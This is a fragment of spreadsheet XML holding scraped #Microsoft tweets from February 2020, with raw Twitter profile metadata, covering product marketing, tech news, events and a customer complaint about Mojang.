'https://pbs.twimg.com/profile_images/723478571243737089/7R2nhJ6R_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/720545088225587200/1576110380',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</si>
  <si>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Feb 26 16:54:06 +0000 2020</t>
  </si>
  <si>
    <t>Certainly not a coincidence that every time I post on theMicrosoft Community about organizing against @Mojang  terrible customer service regarding all of our missing content, @Microsoft  kills the link to our Facebook and locks the post? 
#Minecraft #Mojang #Microsoft https://t.co/9lHfCWrEiZ</t>
  </si>
  <si>
    <t>{'id': 1152214987118645254, 'id_str': '1152214987118645254', 'name': 'Mojang Stole My Money', 'screen_name': 'MojangSucks', 'location': 'Dallas, TX', 'description': 'Ex-Minecraft dad of a family of Ex-Minecraft enthusiasts, sick of being ignored by Mojang regarding lack of access to content.', 'url': 'https://t.co/HrxhQGi09z', 'entities': {'url': {'urls': [{'url': 'https://t.co/HrxhQGi09z', 'expanded_url': 'https://m.facebook.com/MOJANGSTOLEMYMONEY/', 'display_url': 'm.facebook.com/MOJANGSTOLEMYMâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 128, 'friends_count': 136, 'listed_count': 1, 'created_at': 'Fri Jul 19 13:53:54 +0000 2019', 'favourites_count': 32, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 66, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1232708351454334976/_NOpvl64_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232708351454334976/_NOpvl64_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1152214987118645254/1582735549',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</si>
  <si>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16:53:31 +0000 2020</t>
  </si>
  <si>
    <t>Excited to be an @msPartner and support amazing engineers accelerate innovation with #HPCBOX on #Microsoft #Azure. Read our success story delivering HPCBOX on @AzureMktPlace 
https://t.co/QhaNdqWm0E</t>
  </si>
  <si>
    <t>{'id': 920481529452777472, 'id_str': '920481529452777472', 'name': 'Drizti', 'screen_name': 'Drizti_Inc', 'location': 'Toronto, Ontario', 'description': 'Delivering Supercomputing to your PC, we call it Personal Supercomputing. Learn more at https://t.co/iJMt1B4NIO', 'url': 'https://t.co/lI7jncFeWx', 'entities': {'url': {'urls': [{'url': 'https://t.co/lI7jncFeWx', 'expanded_url': 'http://www.drizti.com', 'display_url': 'drizti.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/iJMt1B4NIO', 'expanded_url': 'https://www.drizti.com', 'display_url': 'drizti.com', 'indices': [88, 111]}]}}, 'protected': False, 'followers_count': 10, 'friends_count': 12, 'listed_count': 1, 'created_at': 'Wed Oct 18 02:47:53 +0000 2017', 'favourites_count': 21,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'http://pbs.twimg.com/profile_images/920482448839933952/IogzCuBO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/920482448839933952/IogzCuBO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/920481529452777472/1570845400',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</si>
  <si>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16:52:42 +0000 2020</t>
  </si>
  <si>
    <t>When you know how to use Yammer for in-organization communication, youll succeed. Heres how to integrate Yammer with Office 365.
#Viftech #microsoft #yammer #microsoftteams #micosoftoffice #office365 
https://t.co/WjJ00yicb3</t>
  </si>
  <si>
    <t>{'id': 2936838829, 'id_str': '2936838829', 'name': 'Viftech Solutions', 'screen_name': 'Viftech_', 'location': 'Karachi - Pakistan', 'description': 'The Official Viftech Solutions Twitter Account. Viftech Solutions (Pvt.) Ltd., is a leading Information Technology (IT) solution provider.', 'url': 'https://t.co/lRzEazN0sE', 'entities': {'url': {'urls': [{'url': 'https://t.co/lRzEazN0sE', 'expanded_url': 'http://www.viftech.com', 'display_url': 'viftech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 121, 'friends_count': 76, 'listed_count': 10, 'created_at': 'Sat Dec 20 07:47:04 +0000 2014', 'favourites_count': 52, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 909,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'http://pbs.twimg.com/profile_images/1141317273896017921/Df7gzMhH_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141317273896017921/Df7gzMhH_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2936838829/1562223159',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</si>
  <si>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16:52:02 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 16:51:32 +0000 2020</t>
  </si>
  <si>
    <t>#KPMG combines #CyberSecurity, #data management and industry experience with #Microsofts technology to help clients improve their business protection. https://t.co/aOzSt5awlY</t>
  </si>
  <si>
    <t>{'id': 55502033, 'id_str': '55502033', 'name': 'Bart van Loon', 'screen_name': 'yourGRCpartner', 'location': 'world', 'description': 'Bart van Loon, Partner KPMG Governance, Risk and Compliance How to create an organisation ready for the (dynamic) future / ex Triatleet, Ironman', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 139, 'friends_count': 54, 'listed_count': 9, 'created_at': 'Fri Jul 10 07:41:05 +0000 2009', 'favourites_count': 60, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1432,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'http://pbs.twimg.com/profile_images/1054273790149095424/Neb_3vaZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1054273790149095424/Neb_3vaZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/55502033/1371985764',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</si>
  <si>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16:50:58 +0000 2020</t>
  </si>
  <si>
    <t>Meet Shannon Cotts, our Faces of JSOM undergraduate student for the week! Shannon is currently a Junior and pursuing a double majoring in Accounting/ Marketing at @jindal_utdallas.  #JSOM #FacesOfJSOM #JSOMDeansCouncil #DCtainment #Sales #Microsoft #superstar https://t.co/C8nByS1WA7</t>
  </si>
  <si>
    <t>{'id': 702164532253229056, 'id_str': '702164532253229056', 'name': "JSOM Dean's Council", 'screen_name': 'JSOMDeanCouncil', 'location': 'Richardson, TX', 'description': "The official Twitter of the #JSOM Dean's Council at @UTDallas. \nOWLIE Nominations: https://t.co/LU9ZTdu5uZ", 'url': 'https://t.co/le1UPya0On', 'entities': {'url': {'urls': [{'url': 'https://t.co/le1UPya0On', 'expanded_url': 'http://jindal.utdallas.edu/student-resources/deans-council/', 'display_url': 'jindal.utdallas.edu/student-resourâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/LU9ZTdu5uZ', 'expanded_url': 'https://jindal.utdallas.edu/student-resources/deans-council/owlie-awards/', 'display_url': 'jindal.utdallas.edu/student-resourâ€¦', 'indices': [83, 106]}]}}, 'protected': False, 'followers_count': 30, 'friends_count': 14, 'listed_count': 1, 'created_at': 'Tue Feb 23 16:14:04 +0000 2016', 'favourites_count': 52, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 185, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/702165848308391936/q9L_2i-L_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/702165848308391936/q9L_2i-L_normal.jpg',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</si>
  <si>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16:50:13 +0000 2020</t>
  </si>
  <si>
    <t>Have you completed our salary survey yet? 
No? Thats ok.
Share your thoughts on #Microsoft #Dynamics and you could win a $500 prize! 
 https://t.co/8n3WS1M5yN https://t.co/mSwwykB756</t>
  </si>
  <si>
    <t>Wed Feb 26 16:45:38 +0000 2020</t>
  </si>
  <si>
    <t>#Light_Vision_IT
#3M science Applied To life
#innovit 
#Dohler 
#gicom
Join our worldwide community 
#Microsoft  #Adobe #Google  #ZOHO #HEXAGON  #SAP #Salesforce 
# # # #_ # # https://t.co/RZ9hEKrZJ6</t>
  </si>
  <si>
    <t>{'id': 1154340502021398528, 'id_str': '1154340502021398528', 'name': 'Light Vision IT', 'screen_name': 'LightVisionIT', 'location': 'Saudi Arabia', 'description': 'Ù†Ù‚Ø¯Ù… Ø£Ø­Ø¯Ø« Ø§Ù„Ø­Ù„ÙˆÙ„ Ø§Ù„ØªÙ‚Ù†ÙŠØ© Ùˆ Ø®Ø¯Ù…Ø§Øª Ø§Ù„Ø¨Ø±Ù…Ø¬Ø© Ùˆ Ø§Ù„ØªØ·ÙˆÙŠØ± Ùˆ Ø§Ù„Ø¯Ø¹Ù… Ø§Ù„ÙÙ†ÙŠ Ù„Ù„Ø´Ø±ÙƒØ§Øª Ùˆ Ø±ÙˆØ§Ø¯ Ø§Ù„Ø£Ø¹Ù…Ø§Ù„ Ø¥ÙŠÙ…ÙŠÙ„ :info@lightvisionit.com ÙˆØ§ØªØ³Ø§Ø¨ :https://t.co/lmxoq0NeRB', 'url': 'https://t.co/ge4xVk26HF', 'entities': {'url': {'urls': [{'url': 'https://t.co/ge4xVk26HF', 'expanded_url': 'https://lightvisionit.com', 'display_url': 'lightvisionit.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/lmxoq0NeRB', 'expanded_url': 'https://wa.me/966550919779', 'display_url': 'wa.me/966550919779', 'indices': [126, 149]}]}}, 'protected': False, 'followers_count': 47, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Thu Jul 25 10:39:57 +0000 2019', 'favourites_count': 1,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'http://pbs.twimg.com/profile_images/1154340591167082496/AdLVmAHW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1154340591167082496/AdLVmAHW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1154340502021398528/1564113986',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</si>
  <si>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16:45:27 +0000 2020</t>
  </si>
  <si>
    <t>One of the major benefits of #UCaaS is its speed to market in rolling out new features.  #Microsoft #Teams has rolled out some long over due features that we need. Check them out below! https://t.co/CJt76U0iHl https://t.co/gYig3zXajv</t>
  </si>
  <si>
    <t>{'id': 1146039127344914434, 'id_str': '1146039127344914434', 'name': 'Branden Lee', 'screen_name': 'Branden01770411', 'location': '', 'description': 'Cybersecurity and all things technology', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Tue Jul 02 12:53:15 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 79,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</si>
  <si>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Wed Feb 26 16:44:28 +0000 2020</t>
  </si>
  <si>
    <t>If there's a #gaming company right now that contradicts the idea that "publicly traded companies are only concerned about short term profit", it's #Microsoft. Everything they are doing right now is the definition of a medium-to-long term growth strategy. #Xbox</t>
  </si>
  <si>
    <t>Wed Feb 26 16:42:40 +0000 2020</t>
  </si>
  <si>
    <t>A former #employee at #Microsoft has been found guilty of 18 federal felonies in connection with a #complex scheme to embezzle $10 #million using #cryptocurrency.
https://t.co/VEWcZrXWAg
#Rakamoto #Wednesdaythoughts #Blockchain #Crypto #Bitcoin #Digital #Money #Coins #Dollar</t>
  </si>
  <si>
    <t>Wed Feb 26 16:42:24 +0000 2020</t>
  </si>
  <si>
    <t>Inside #Disney's Bold $200M #Gamble on '#Mulan': "TheStakes Couldn't Be Higher" https://t.co/5RIPF8UzNu 
#bigdata 
#AI #IOT #DiGiTAL #Twitter
#Movies
#Microsoft #apple @Chidambara09 #linux #china #usa #google #EU #youtube
#Celebrity #model #actress #movies #uk #fashio
#bitcoin</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</si>
  <si>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927210,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</si>
  <si>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16:41:51 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT https://t.co/ZTIcvYqTx7 Pot. intermed bot in Downtrend INTRAWEEK 60m-15m-4m combo chart #Microsoft #Stocks https://t.co/AzES0D7GRK</t>
  </si>
  <si>
    <t>{'id': 3834138105, 'id_str': '3834138105', 'name': 'Co-Branded FinGraphs', 'screen_name': 'CFingraphs', 'location': 'your location &amp; globally', 'description': 'Promote your offer with a #FinGraphs Co-Branded Twitter a/c Post charts from your selection which Link back to your Co-Branded FinGraphs website', 'url': 'http://t.co/ZrIfZMmWA1', 'entities': {'url': {'urls': [{'url': 'http://t.co/ZrIfZMmWA1', 'expanded_url': 'http://demo.fingraphs.com', 'display_url': 'demo.fingraphs.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 664, 'friends_count': 112, 'listed_count': 202, 'created_at': 'Thu Oct 01 14:24:24 +0000 2015', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 139131,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'http://pbs.twimg.com/profile_images/656429386661560320/5x91TVQ1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/656429386661560320/5x91TVQ1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3834138105/1444037587',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</si>
  <si>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16:41:48 +0000 2020</t>
  </si>
  <si>
    <t>In October 2019, #Microsoft and #Intel conducted performance and scalability testing workloads on Microsoft SQL Server 2019 Big Data Cluster, the combination of Intel Xeon Scalable and Intel #SSDs platform can address many of your #BigData challenges https://t.co/ZUtlE4Mx8g</t>
  </si>
  <si>
    <t>{'id': 826911298571161602, 'id_str': '826911298571161602', 'name': 'Gustavo Sevilla', 'screen_name': 'GsevillaTec', 'location': '', 'description': 'Technologist &amp; Advisor @Intel | IoT SME | TKP &amp; KMP &amp; ITIL | Opinions are mine, more feeds available:', 'url': 'https://t.co/WdoaZraikt', 'entities': {'url': {'urls': [{'url': 'https://t.co/WdoaZraikt', 'expanded_url': 'https://mx.linkedin.com/in/gsevilla', 'display_url': 'mx.linkedin.com/in/gsevilla', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 149, 'friends_count': 151, 'listed_count': 25, 'created_at': 'Wed Feb 01 21:53:11 +0000 2017', 'favourites_count': 971, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4777,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'http://pbs.twimg.com/profile_images/827225067918462976/gDT-s5ZI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/827225067918462976/gDT-s5ZI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/826911298571161602/1486061760',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</si>
  <si>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16:41:04 +0000 2020</t>
  </si>
  <si>
    <t>Know the cloud. Not all cloud solutions are the same, but do you know the fine print strategies to find the best cloud solutions for your business? Contact us to learn more. #Azure #Microsoft #mspartner #dsi #welovedata #welovecloud https://t.co/kOpVCaFR7V</t>
  </si>
  <si>
    <t>{'id': 4090935021, 'id_str': '4090935021', 'name': 'DSI', 'screen_name': 'DSIDataExperts', 'location': 'Toronto, Ontario', 'description': "#Advanced and #Predictive #Data #Analytics. Power BI #Experts. App Dev. #CRM. #Azure. Microsoft Gold Partner. IMPACT Award Winners. We're all about the data.", 'url': 'https://t.co/RBcr9YTicN', 'entities': {'url': {'urls': [{'url': 'https://t.co/RBcr9YTicN', 'expanded_url': 'http://www.dstrat.com', 'display_url': 'dstrat.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 185, 'friends_count': 231, 'listed_count': 43, 'created_at': 'Sun Nov 01 16:08:32 +0000 2015', 'favourites_count': 214, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 969,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'http://pbs.twimg.com/profile_images/660855797711290368/v-NhCRav_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/660855797711290368/v-NhCRav_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4090935021/1512675428', 'profile_link_color': '7BC143',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</si>
  <si>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16:41:01 +0000 2020</t>
  </si>
  <si>
    <t>The significance of error bars is so much that it influences the user's data interpretation. https://t.co/USaDfB7cE5 comes with support for error bar in PowerBI custom visuals https://t.co/5QCk5s8Nup
#xviz #powerbi #microsoft #errorbars #visualization</t>
  </si>
  <si>
    <t>{'id': 8156612, 'id_str': '8156612', 'name': 'nsdevaraj', 'screen_name': 'nsdevaraj', 'location': 'Chennai', 'description': 'Talent hits a target no one else can hit; Genius hits a target no one else can see.. \n\nà®®à¯†à®©à¯à®ªà¯Šà®°à¯à®³à¯ à®…à®®à¯ˆà®ªà¯à®ªà¯ à®•à®Ÿà¯à®Ÿà¯à®®à®¾à®¨à®°à¯\n\nConnect with me on https://t.co/Cn50e1blXY', 'url': 'https://t.co/D1rBsWIfXn', 'entities': {'url': {'urls': [{'url': 'https://t.co/D1rBsWIfXn', 'expanded_url': 'http://about.me/nsdevaraj', 'display_url': 'about.me/nsdevaraj', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/Cn50e1blXY', 'expanded_url': 'http://linkedin.com/in/nsdevaraj', 'display_url': 'linkedin.com/in/nsdevaraj', 'indices': [137, 160]}]}}, 'protected': False, 'followers_count': 630, 'friends_count': 154, 'listed_count': 71, 'created_at': 'Mon Aug 13 11:09:42 +0000 2007', 'favourites_count': 9400, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16573, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '709397', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme8/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme8/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1068375959651241984/MnyoM2Fo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1068375959651241984/MnyoM2Fo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/8156612/1561548099',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</si>
  <si>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Wed Feb 26 16:40:32 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/kU1QDAqYuF
Our colleagues Gary Raife and Zoe Wilson share their thoughts on how Microsofts Power Platform suite can help the public sector to #innovate, #accelerate #transformation and solve workflow issues.
#MicrosoftPowerPlatform #Microsoft #Automation #RPA https://t.co/qJDNAL3SJG</t>
  </si>
  <si>
    <t>Wed Feb 26 16:40:04 +0000 2020</t>
  </si>
  <si>
    <t>A #former #Microsoft engineer has been declared guilty for stealing #more than $10 #million in #digital #currency.
https://t.co/bxmd0kIqd5
#Rakamoto #Wednesdaythoughts #Blockchain #Crypto #Bitcoin #Digital #Money #Coins #Dollar #Banks</t>
  </si>
  <si>
    <t>Wed Feb 26 16:39:18 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 looks set to get a redesigned Start menu in a future update, with Microsoft finally killing off Live Tiles for good.
https://t.co/LXJ3YGzySK
#Microsoft #Windows10 #Windows10Home #WindowsUpdate #tech #computer #PC #Computing https://t.co/O6ps161O7W</t>
  </si>
  <si>
    <t>{'id': 3246000561, 'id_str': '3246000561', 'name': 'My Hosting Bubble', 'screen_name': 'myhostingbubble', 'location': 'Chelwood Gate, England', 'description': "We are the UK's Leading Providers of Web Hosting, Reseller Hosting, Domain Names, Dedicated Servers, VPS &amp; Email Hosting.", 'url': 'https://t.co/x83hGh5Vc3', 'entities': {'url': {'urls': [{'url': 'https://t.co/x83hGh5Vc3', 'expanded_url': 'http://www.myhostingbubble.com', 'display_url': 'myhostingbubble.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 15496, 'friends_count': 14802, 'listed_count': 96, 'created_at': 'Mon May 11 08:53:14 +0000 2015', 'favourites_count': 838, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 588,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'http://pbs.twimg.com/profile_images/683964518817501184/hpNwf6nz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/683964518817501184/hpNwf6nz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3246000561/1484564694',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</si>
  <si>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Feb 26 16:37:13 +0000 2020</t>
  </si>
  <si>
    <t>Mover, #Microsoft's free #cloud-to-cloud migration tool, is "now available to Microsoft 365 customers worldwide," Microsoft announced ... https://t.co/mdonGt1gww #Microsoft365</t>
  </si>
  <si>
    <t>Wed Feb 26 16:36:24 +0000 2020</t>
  </si>
  <si>
    <t>Ex-#Microsoft Employee Convicted of 18 Felonies in Digital Currency Scheme - #Bitcoin #Court #Crimes #Fraud #Government #Regulation #UnitedStates - https://t.co/VQKgo1NvF6 https://t.co/tS9XSWeVVt</t>
  </si>
  <si>
    <t>Wed Feb 26 16:36:02 +0000 2020</t>
  </si>
  <si>
    <t>***Tip of the Day***
When the output of a command in PowerShell is very large, we have to change the size of the PowerShell window to see the results at a glance. 
How to change the default size: https://t.co/K1nNlGUAJc
#Microsoft #PowerShellTips #Windows10 https://t.co/C9GAzoUHrr</t>
  </si>
  <si>
    <t>Wed Feb 26 16:32:22 +0000 2020</t>
  </si>
  <si>
    <t>Meet the first wave of speakers &amp;amp; enter your startup for The Europas Awards, 25 June https://t.co/xarC05fvDk #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 16:32:21 +0000 2020</t>
  </si>
  <si>
    <t>LGs latest has an optional second screen and a headphone jack https://t.co/ebc7gDl4Bg #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 16:32:06 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft announces that its free Mover #cloud-to-cloud migration tool is "now available to Microsoft 365 customers worldwide." https://t.co/ketMIAjF7W #Microsoft365</t>
  </si>
  <si>
    <t>Wed Feb 26 16:30:03 +0000 2020</t>
  </si>
  <si>
    <t>1 week to go to #Techitalia #womenintech  meetup!
Join us next week, on the 4th of March, at #Microsoft Reactor for a great evening with some fantastic women entrepreneurs speakers. 
RSVPhttps://t.co/3P3Tip9AnO https://t.co/i4IgQQGSgG</t>
  </si>
  <si>
    <t>{'id': 35553661, 'id_str': '35553661', 'name': 'Techitalia', 'screen_name': 'StartupUK', 'location': 'London', 'description': 'TechItalia is creating the largest community and tech ecosystem of Italian tech professionals, startups, scale-ups and professionals.', 'url': 'https://t.co/VU8K5LMhUm', 'entities': {'url': {'urls': [{'url': 'https://t.co/VU8K5LMhUm', 'expanded_url': 'http://www.techitalialab.com', 'display_url': 'techitalialab.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 42047, 'friends_count': 2383, 'listed_count': 776, 'created_at': 'Sun Apr 26 20:19:00 +0000 2009', 'favourites_count': 153, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13987,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'http://pbs.twimg.com/profile_images/1174330432202117120/RM4qy6Cw_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1174330432202117120/RM4qy6Cw_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/35553661/1568817223',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</si>
  <si>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16:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Last year, Microsoft introduced a new, secure space in OneDrive. We took a closer look at the security and use cases of the Personal Vault.
#Microsoft #OneDrive #PersonalVault #Security #2FA
https://t.co/Vpg77TYDMr</t>
  </si>
  <si>
    <t>{'id': 249323356, 'id_str': '249323356', 'name': 'Boxcryptor', 'screen_name': 'boxcryptor', 'location': 'Germany', 'description': 'Highest Security with #encryption for your Files in the Cloud', 'url': 'http://t.co/NoUete3DFG', 'entities': {'url': {'urls': [{'url': 'http://t.co/NoUete3DFG', 'expanded_url': 'http://www.boxcryptor.com', 'display_url': 'boxcryptor.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4234, 'friends_count': 364, 'listed_count': 226, 'created_at': 'Tue Feb 08 20:33:03 +0000 2011', 'favourites_count': 1462, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4676, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '008A2E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/793711806028115968/qlA0d-5o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/793711806028115968/qlA0d-5o_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/249323356/1582211658', 'profile_link_color': '0073AE',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</si>
  <si>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16:28:31 +0000 2020</t>
  </si>
  <si>
    <t>What's Coming Up for #Azure #DevOps Boards, Repos, Pipelines and More https://t.co/UWuhVeEH8R #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 16:27:30 +0000 2020</t>
  </si>
  <si>
    <t>Paul Fast of @fast_epp structural engineers says huge interest in building with #masstimber in #UnitedStates. Cheaper than concrete, plus aesthetics of mass timber very prevalent in #commercial office now. #Google and #Microsoft are using it.</t>
  </si>
  <si>
    <t>{'id': 54685854, 'id_str': '54685854', 'name': 'UDI Pacific Region', 'screen_name': 'udibc', 'location': 'Vancouver, BC Canada', 'description': "Partner in community building &amp; premier voice of BC's residential, commercial and industrial building industry. Social Media Policy: https://t.co/T92VnVzWm0â€¦", 'url': 'http://t.co/hFG3F2hj9T', 'entities': {'url': {'urls': [{'url': 'http://t.co/hFG3F2hj9T', 'expanded_url': 'http://www.udi.bc.ca', 'display_url': 'udi.bc.ca', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/T92VnVzWm0', 'expanded_url': 'http://udi.bc.ca/privacy-social', 'display_url': 'udi.bc.ca/privacy-social', 'indices': [133, 156]}]}}, 'protected': False, 'followers_count': 6553, 'friends_count': 4719, 'listed_count': 169, 'created_at': 'Tue Jul 07 21:37:23 +0000 2009', 'favourites_count': 2560, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12549, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '353335', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/607989998210523137/KrTr-EsT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/607989998210523137/KrTr-EsT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/54685854/1492808927', 'profile_link_color': '0C0957',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</si>
  <si>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16:27:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Team channels bring you security and inclusion. https://t.co/2hesXcNK4q #productivity</t>
  </si>
  <si>
    <t>Wed Feb 26 16:27:01 +0000 2020</t>
  </si>
  <si>
    <t>CollabNews just released https://t.co/uE8vqJ5G7c many thanks @jwdenhartog #onedrive #microsoft</t>
  </si>
  <si>
    <t>{'id': 18921160, 'id_str': '18921160', 'name': 'Mr.OneDrive | MVP #Speaker, working on a BOT', 'screen_name': 'HansBrender', 'location': 'Aalen, Germany', 'description': '#MVP Office Apps and Services,  OneDrive for Business, #OneDrive, Next Generation Sync Client, #NGSC, #ODFB #OD4B, #Office #Collaboration', 'url': 'http://t.co/KkT04gk78V', 'entities': {'url': {'urls': [{'url': 'http://t.co/KkT04gk78V', 'expanded_url': 'http://about.me/hans.brender', 'display_url': 'about.me/hans.brender', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3663, 'friends_count': 1509, 'listed_count': 252, 'created_at': 'Tue Jan 13 00:01:34 +0000 2009', 'favourites_count': 4056, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 49643,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'http://pbs.twimg.com/profile_images/1083051899983675393/bJX1dgFQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1083051899983675393/bJX1dgFQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18921160/1398255885', 'profile_link_color': '2F82ED',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</si>
  <si>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Wed Feb 26 16:25:59 +0000 2020</t>
  </si>
  <si>
    <t>Story time:
My friend Paul was having trouble in his job at #Microsoft. He was getting overworked on an understaffed team and wasnt getting the respect he was due. This would stress/upset him so much that he wouldnt eat/sleep for days at a time but would still come into work.</t>
  </si>
  <si>
    <t>{'id': 4648239775, 'id_str': '4648239775', 'name': 'mitchel lewis', 'screen_name': 'stautistic', 'location': 'Bellevue, WA', 'description': 'Iâ€™m just an engineer with a philosophy habit and a farming problem. xMicrosoft, xHollandAmerica, xBlueShield', 'url': 'https://t.co/91wTnmeJhM', 'entities': {'url': {'urls': [{'url': 'https://t.co/91wTnmeJhM', 'expanded_url': 'https://medium.com/@wtfmitchel', 'display_url': 'medium.com/@wtfmitchel', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 599, 'friends_count': 1750, 'listed_count': 18, 'created_at': 'Fri Dec 25 08:35:12 +0000 2015', 'favourites_count': 35177, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 26801,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'http://pbs.twimg.com/profile_images/1168245324646715392/mp9Gm20l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168245324646715392/mp9Gm20l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4648239775/1559149742',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</si>
  <si>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16:25:06 +0000 2020</t>
  </si>
  <si>
    <t>Cloud is the direction of travel for many organisation like yours, be that datacentre modernisation or the adoption of transformative technology such as Bots, Data Analytics or Machine Learning.
https://t.co/ohX6nwOSrM
#cloud #azure #technology #microsoft #transformation #data https://t.co/gduYl0OrXS</t>
  </si>
  <si>
    <t>Wed Feb 26 16:23:55 +0000 2020</t>
  </si>
